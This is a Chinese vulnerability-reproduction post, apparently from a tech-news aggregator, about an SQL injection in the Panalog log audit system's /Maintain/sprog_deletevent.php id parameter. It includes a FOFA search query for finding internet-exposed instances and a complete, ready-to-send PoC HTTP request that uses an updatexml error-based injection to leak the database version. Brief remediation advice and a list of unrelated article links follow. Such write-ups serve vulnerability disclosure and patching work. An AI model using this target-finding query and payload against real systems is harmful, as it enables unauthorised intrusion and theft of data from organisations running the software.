当前位置: 首页 > news >正文

Panalog 日志审计系统 sprog_deletevent.php SQL 注入漏洞复现

0x01 产品简介

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。

0x02 漏洞概述

Panabit /Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。

0x03 复现环境

FOFA:app="Panabit-Panalog" && port="8012"

0x04 漏洞复现 

PoC

GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

查询数据库版本

0x05 修复建议 

对传入的 sql 语句进行预编译处理。

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

http://www.lryc.cn/news/257735.html

相关文章:

  • openGauss学习笔记-152 openGauss 数据库运维-备份与恢复-物理备份与恢复之PITR恢复
  • PhpStorm基本配置及常用快捷键
  • Autosar通信实战系列05-CanNM模块进阶常见问题思考
  • Java中多态的一些简单理解
  • 011 数据结构_哈希
  • 案例025:基于微信小程序的移动学习平台的设计与实现
  • 写实3D游戏模型纹理贴图设置
  • 如何基于Akamai IoT边缘平台打造一个无服务器的位置分享应用
  • 【开源】基于JAVA的木马文件检测系统
  • KaiOS 运营商相关文件operator_variant_manager.js代码功能和调试
  • 【数据结构(六)】排序算法介绍和算法的复杂度计算(1)
  • 带有 RaspiCam 的 Raspberry Pi 监控和延时摄影摄像机
  • Apache Doris 在某工商信息商业查询平台的湖仓一体建设实践
  • 【尘缘送书第六期】2023年度学习:AIGC、AGI、GhatGPT、人工智能大模型实现必读书单
  • 我的 CSDN 三周年创作纪念日:2020-12-12
  • 什么是css初始化
  • 谁会成为第一个MoE大模型基座呢?重磅!Mixtral MoE 8x7B!!!
  • Linux升级nginx版本
  • 人工智能|网络爬虫——用Python爬取电影数据并可视化分析
  • mac苹果笔记本电脑如何强力删除卸载app软件?
  • net6中使用MongoDB
  • vue中yarn install超时问题
  • vue3 引入 markdown编辑器
  • 算法----K 和数对的最大数目
  • RocketMQ-源码架构
  • 14-1、IO流
  • 每日一道算法题 1
  • 【网络奇缘】- 计算机网络|深入学习物理层|网络安全
  • ❀expect命令运用于bash❀
  • 2023年团体程序设计天梯赛——总决赛题